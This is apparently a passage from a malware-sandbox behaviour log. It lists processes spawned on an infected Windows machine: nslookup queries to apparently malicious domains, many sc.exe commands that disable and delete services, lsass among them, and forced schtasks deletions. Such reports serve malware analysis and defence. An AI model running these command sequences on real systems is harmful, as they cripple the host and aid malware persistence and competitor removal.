C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5763.tmp" "c:\Users\Admin\AppData\Local\Temp\sth3awg3\CSC5AB8D07DA1764486A12615F68A7F9C48.TMP"
5⤵
PID:2168

C:\Windows\system32\nslookup.exe
"C:\Windows\system32\nslookup.exe" pg.b69kq.com
4⤵
PID:2200

C:\Windows\system32\nslookup.exe
"C:\Windows\system32\nslookup.exe" p.b69kq.com
4⤵
PID:2220

C:\Windows\system32\nslookup.exe
"C:\Windows\system32\nslookup.exe" pg.k3qh4.com
4⤵
PID:2240

C:\Windows\system32\nslookup.exe
"C:\Windows\system32\nslookup.exe" p.k3qh4.com
4⤵
PID:2260

C:\Windows\system32\nslookup.exe
"C:\Windows\system32\nslookup.exe" lplp.ackng.com
4⤵
PID:2324

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop TCP
4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config xWinWpdSrv Start= Disabled
4⤵
PID:2408

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop xWinWpdSrv
4⤵
PID:2428

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete xWinWpdSrv
4⤵
PID:2448

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SVSHost Start= Disabled
4⤵
PID:2468

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SVSHost
4⤵
PID:2488

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SVSHost
4⤵
PID:2508

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "Microsoft Telemetry" Start= Disabled
4⤵
PID:2528

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "Microsoft Telemetry"
4⤵
PID:2572

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "Microsoft Telemetry"
4⤵
PID:2552

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config lsass Start= Disabled
4⤵
PID:2592

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop lsass
4⤵
PID:2612

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete lsass
4⤵
PID:2632

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Microsoft Start= Disabled
4⤵
PID:2652

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Microsoft
4⤵
PID:2672

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Microsoft
4⤵
PID:2704

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config system Start= Disabled
4⤵
PID:2724

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop system
4⤵
PID:2744

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete system
4⤵
PID:2764

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Oracleupdate Start= Disabled
4⤵
PID:2784

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Oracleupdate
4⤵
PID:2832

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config CLR Start= Disabled
4⤵
PID:2868

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Oracleupdate
4⤵
PID:2804

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop CLR
4⤵
PID:2888

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete CLR
4⤵
PID:2912

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config sysmgt Start= Disabled
4⤵
PID:2940

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop sysmgt
4⤵
PID:2960

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete sysmgt
4⤵
PID:2984

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config \gm Start= Disabled
4⤵
PID:3004

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop \gm
4⤵
PID:3024

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete \gm
4⤵
PID:3048

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WmdnPnSN Start= Disabled
4⤵
PID:3068

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WmdnPnSN
4⤵
PID:2104

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WmdnPnSN
4⤵
PID:2136

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Sougoudl Start= Disabled
4⤵
PID:2176

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Sougoudl
4⤵
PID:2184

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Sougoudl
4⤵
PID:2216

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config National Start= Disabled
4⤵
PID:2248

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop National
4⤵
PID:2268

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete National
4⤵
PID:2332

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationaaal Start= Disabled
4⤵
PID:2328

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationaaal
4⤵
PID:2384

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationaaal
4⤵
PID:2324

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Natimmonal Start= Disabled
4⤵
PID:2252

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Natimmonal
4⤵
PID:2412

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Natimmonal
4⤵
PID:2436

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationaloll Start= Disabled
4⤵
PID:2476

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationaloll
4⤵
PID:2492

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationaloll
4⤵
PID:2524

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalmll Start= Disabled
4⤵
PID:2532

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalmll
4⤵
PID:2588

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalmll
4⤵
PID:2596

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalaie Start= Disabled
4⤵
PID:2620

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalaie
4⤵
PID:2668

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalaie
4⤵
PID:2688

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Nationalwpi Start= Disabled
4⤵
PID:2388

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Nationalwpi
4⤵
PID:2760

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Nationalwpi
4⤵
PID:2768

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelp32 Start= Disabled
4⤵
PID:2812

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelp32
4⤵
PID:2840

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelp32
4⤵
PID:2884

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelp64 Start= Disabled
4⤵
PID:2908

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelp64
4⤵
PID:2932

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelp64
4⤵
PID:2468

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Samserver Start= Disabled
4⤵
PID:2868

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Samserver
4⤵
PID:2632

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Samserver
4⤵
PID:2652

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config RpcEptManger Start= Disabled
4⤵
PID:2420

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop RpcEptManger
4⤵
PID:2604

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete RpcEptManger
4⤵
PID:2684

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "NetMsmqActiv Media NVIDIA" Start= Disabled
4⤵
PID:2776

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "NetMsmqActiv Media NVIDIA"
4⤵
PID:2880

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA"
4⤵
PID:2968

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "Sncryption Media Playeq" Start= Disabled
4⤵
PID:2992

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "Sncryption Media Playeq"
4⤵
PID:3056

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "Sncryption Media Playeq"
4⤵
PID:2060

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SxS Start= Disabled
4⤵
PID:1140

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SxS
4⤵
PID:1564

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SxS
4⤵
PID:2148

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinSvc Start= Disabled
4⤵
PID:2196

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinSvc
4⤵
PID:2244

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinSvc
4⤵
PID:2292

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config mssecsvc2.1 Start= Disabled
4⤵
PID:2320

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop mssecsvc2.1
4⤵
PID:2240

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete mssecsvc2.1
4⤵
PID:2232

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config mssecsvc2.0 Start= Disabled
4⤵
PID:2336

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop mssecsvc2.0
4⤵
PID:2504

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete mssecsvc2.0
4⤵
PID:2536

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Windows_Update Start= Disabled
4⤵
PID:2600

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Windows_Update
4⤵
PID:2640

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Windows_Update
4⤵
PID:2708

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled
4⤵
PID:2780

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "Windows Managers"
4⤵
PID:2752

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "Windows Managers"
4⤵
PID:2896

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SvcNlauser Start= Disabled
4⤵
PID:2956

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SvcNlauser
4⤵
PID:2508

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SvcNlauser
4⤵
PID:2612

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinVaultSvc Start= Disabled
4⤵
PID:2672

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinVaultSvc
4⤵
PID:2804

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinVaultSvc
4⤵
PID:2480

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Xtfy Start= Disabled
4⤵
PID:2756

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Xtfy
4⤵
PID:2952

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Xtfy
4⤵
PID:3000

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Xtfya Start= Disabled
4⤵
PID:2500

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Xtfya
4⤵
PID:3028

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Xtfya
4⤵
PID:2100

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Xtfyxxx Start= Disabled
4⤵
PID:2156

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Xtfyxxx
4⤵
PID:2936

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Xtfyxxx
4⤵
PID:2228

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config 360rTys Start= Disabled
4⤵
PID:2260

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop 360rTys
4⤵
PID:2220

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config IPSECS Start= Disabled
4⤵
PID:2576

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete 360rTys
4⤵
PID:2496

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop IPSECS
4⤵
PID:2680

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete IPSECS
4⤵
PID:2808

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config MpeSvc Start= Disabled
4⤵
PID:2916

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop MpeSvc
4⤵
PID:2944

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete MpeSvc
4⤵
PID:2440

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SRDSL Start= Disabled
4⤵
PID:2976

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SRDSL
4⤵
PID:3012

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SRDSL
4⤵
PID:2112

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WifiService Start= Disabled
4⤵
PID:2340

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WifiService
4⤵
PID:2432

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WifiService
4⤵
PID:2560

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ALGM Start= Disabled
4⤵
PID:2764

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ALGM
4⤵
PID:3044

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ALGM
4⤵
PID:2144

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config wmiApSrvs Start= Disabled
4⤵
PID:2464

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop wmiApSrvs
4⤵
PID:2796

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete wmiApSrvs
4⤵
PID:2424

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config wmiApServs Start= Disabled
4⤵
PID:2520

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop wmiApServs
4⤵
PID:3096

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete wmiApServs
4⤵
PID:3184

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config taskmgr1 Start= Disabled
4⤵
PID:3200

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop taskmgr1
4⤵
PID:3224

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete taskmgr1
4⤵
PID:3240

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WebServers Start= Disabled
4⤵
PID:3256

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WebServers
4⤵
PID:3272

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WebServers
4⤵
PID:3288

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ExpressVNService Start= Disabled
4⤵
PID:3304

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ExpressVNService
4⤵
PID:3356

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ExpressVNService
4⤵
PID:3384

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WWW.DDOS.CN.COM Start= Disabled
4⤵
PID:3400

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WWW.DDOS.CN.COM
4⤵
PID:3416

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WWW.DDOS.CN.COM
4⤵
PID:3432

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHelpSvcs Start= Disabled
4⤵
PID:3448

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHelpSvcs
4⤵
PID:3464

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHelpSvcs
4⤵
PID:3480

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config aspnet_staters Start= Disabled
4⤵
PID:3496

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop aspnet_staters
4⤵
PID:3520

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete aspnet_staters
4⤵
PID:3536

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config clr_optimization Start= Disabled
4⤵
PID:3552

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop clr_optimization
4⤵
PID:3568

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete clr_optimization
4⤵
PID:3584

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config AxInstSV Start= Disabled
4⤵
PID:3604

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop AxInstSV
4⤵
PID:3620

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete AxInstSV
4⤵
PID:3636

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Zational Start= Disabled
4⤵
PID:3652

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Zational
4⤵
PID:3672

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Zational
4⤵
PID:3696

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config "DNS Server" Start= Disabled
4⤵
PID:3712

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop "DNS Server"
4⤵
PID:3736

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete "DNS Server"
4⤵
PID:3752

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config Serhiez Start= Disabled
4⤵
PID:3768

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop Serhiez
4⤵
PID:3784

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete Serhiez
4⤵
PID:3800

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config SuperProServer Start= Disabled
4⤵
PID:3816

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop SuperProServer
4⤵
PID:3832

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete SuperProServer
4⤵
PID:3848

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ".Net CLR" Start= Disabled
4⤵
PID:3864

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ".Net CLR"
4⤵
PID:3880

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ".Net CLR"
4⤵
PID:3896

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WissssssnHelp32 Start= Disabled
4⤵
PID:3912

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WissssssnHelp32
4⤵
PID:3928

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WissssssnHelp32
4⤵
PID:3944

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHasdadelp32 Start= Disabled
4⤵
PID:3960

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHasdadelp32
4⤵
PID:3976

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHasdadelp32
4⤵
PID:3992

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config WinHasdelp32 Start= Disabled
4⤵
PID:4008

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop WinHasdelp32
4⤵
PID:4024

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete WinHasdelp32
4⤵
PID:4040

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Config ClipBooks Start= Disabled
4⤵
PID:4056

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Stop ClipBooks
4⤵
PID:4076

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" Delete ClipBooks
4⤵
PID:4092

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN my1 /F
4⤵
PID:3116

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa /F
4⤵
PID:3196

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa1 /F
4⤵
PID:2112

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa2 /F
4⤵
PID:3184

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Mysa3 /F
4⤵
PID:2424

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN ok /F
4⤵
PID:2176

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java" /F
4⤵
PID:2952

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Java Update" /F
4⤵
PID:2420

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Microsoft Telemetry" /F
4⤵
PID:2260

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Spooler SubSystem Service" /F
4⤵
PID:2384

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Oracle Products Reporter" /F
4⤵
PID:2496

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for products" /F
4⤵
PID:2976

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN gm /F
4⤵
PID:2612

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN ngm /F
4⤵
PID:2332

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Sorry /F
4⤵
PID:1564

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Windows_Update /F
4⤵
PID:2268

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update_windows /F
4⤵
PID:2776

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate1 /F
4⤵
PID:2100

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate2 /F
4⤵
PID:2388

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsUpdate3 /F
4⤵
PID:2520

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN AdobeFlashPlayer /F
4⤵
PID:3016

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer1 /F
4⤵
PID:2164

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer2 /F
4⤵
PID:2348

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN FlashPlayer3 /F
4⤵
PID:2376

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN IIS /F
4⤵
PID:2548

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WindowsLogTasks /F
4⤵
PID:2648

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "System Log Security Check" /F
4⤵
PID:2772

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update /F
4⤵
PID:2876

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update1 /F
4⤵
PID:2408

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update2 /F
4⤵
PID:2644

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update3 /F
4⤵
PID:2964

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Update4 /F
4⤵
PID:2128

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DNS /F
4⤵
PID:2256

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEM /F
4⤵
PID:2380

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DNS2 /F
4⤵
PID:2628

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN SYSTEMa /F
4⤵
PID:2792

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN skycmd /F
4⤵
PID:2784

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Miscfost /F
4⤵
PID:2844

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Netframework /F
4⤵
PID:3052

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Flash /F
4⤵
PID:2352

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN RavTask /F
4⤵
PID:2636

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN GooglePingConfigs /F
4⤵
PID:2832

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN HomeGroupProvider /F
4⤵
PID:2208

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN MiscfostNsi /F
4⤵
PID:2900

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WwANsvc /F
4⤵
PID:2116

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Bluetooths /F
4⤵
PID:3192

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Ddrivers /F
4⤵
PID:3216

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DnsScan /F
4⤵
PID:3252

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN WebServers /F
4⤵
PID:3284

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN Credentials /F
4⤵
PID:3308

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN TablteInputout /F
4⤵
PID:3348

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN werclpsyport /F
4⤵
PID:3372

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN HispDemorn /F
4⤵
PID:3396

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN LimeRAT-Admin /F
4⤵
PID:2712

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F
4⤵
PID:3436

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN "Update service for Windows Service" /F
4⤵
PID:3468

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN DnsCore /F
4⤵
PID:3500

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /TN ECDnsCore /F
4⤵
PID:3540

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe"
4⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3596

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -anop TCP
4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\system32\cmd.exe
